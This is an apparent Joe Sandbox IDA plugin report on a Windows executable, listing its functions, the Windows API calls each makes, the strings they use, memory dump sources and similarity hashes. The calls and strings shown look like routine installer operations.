                                                                                            • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                            • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                            • API String ID: 1646373207-260599015
                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                            • API String ID: 1646373207-597752486
                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                            • API String ID: 1646373207-834958232
                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                            APIs
                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2238633743-2683653824
                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                            APIs
                                                                                              • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                              • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                            • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                            • API String ID: 2406187244-2685451598
                                                                                            • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                            • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 00413D46
                                                                                            • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                              • Part of subcall function 00418EC0: 6FAEC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                              • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
• Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
• Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
• Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
• Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
• Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
• Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
• IsRectEmpty.USER32(?), ref: 0044E953
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
• Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
• Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
• Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
• Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
• Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
• Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
• Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
APIs
• GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
• UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
• RegisterClassA.USER32(00499598), ref: 0041F4D4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
• Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
APIs
• WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
• CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
• Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
• Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
• Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
• Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
• LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
• Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
• Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
APIs
• GetLastError.KERNEL32(?,00000000), ref: 004705F1
Strings
• Failed to set NTFS compression state (%d)., xrefs: 00470602
• Unsetting NTFS compression on file: %s, xrefs: 004705D7
• Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
